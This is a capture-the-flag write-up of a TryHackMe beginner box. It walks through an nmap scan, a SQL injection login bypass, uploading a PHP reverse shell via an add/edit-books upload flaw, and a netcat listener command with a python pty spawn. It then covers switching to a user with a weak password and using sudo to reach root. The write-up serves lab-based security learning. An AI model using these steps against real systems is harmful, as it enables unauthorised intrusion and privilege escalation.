This post is a write-up of the Incognito CTF beginner box on Tryhackme.
Let’s get started by deploying the machine. Now, after deploying the machine, start with a basic Nmap scan and see which ports and services are open and running on the particular IP address.
nmap -sC -sV -A -T4 10.10.194.255
Port 80 is open and running so let’s look at the webpage first. The webpage is a login page of an LMS(Library Management System).
So whenever I see such type of a login page in any box my first step is to either put common usernames and passwords or dictionary attack with the help of hydra or a basic SQL injection.
This time I started with the later one which is SQL injection and I got into the website with a basic payload.
After I got in I checked various functionalities to possibly find an injection point or to search for other vulnerable stuff, after some exploring I found out that the website was vulnerable through a File Inclusion Attack which could be exploited using the function add/edit books.
So here I used Pentest Monkey’s PHP Reverse Shell to get the reverse shell and get into the box.
Before uploading the shell I opened a listening connection via netcat.
nc -lnvp 9999
As you can see this is not an interactive pty so in order to run commands like su we need to spawn a pty via a python command.
python3 -c 'import pty; pty.spawn("/bin/bash")'
After getting a stable pty I found a user cirius and got the user flag from there.
Now initially I had trouble getting the root but the CTF author released a hint on discord that user cirius is using a weak password. I used su cirius with password password to switch current user as cirius.
After changing the user I tried the sudo -l command which will list all the allowed commands for the particular user.
From here we can deduce that we can run as a superuser on basically anything as long as we have the password.
so let’s become a superuser and get the final flag that’s supposed to be in /root.
Reading the root.txt file, I saw the last flag and was able to complete the box!. For more writeups like this, you can click here. Many more writeups of Incognito CTF coming soon.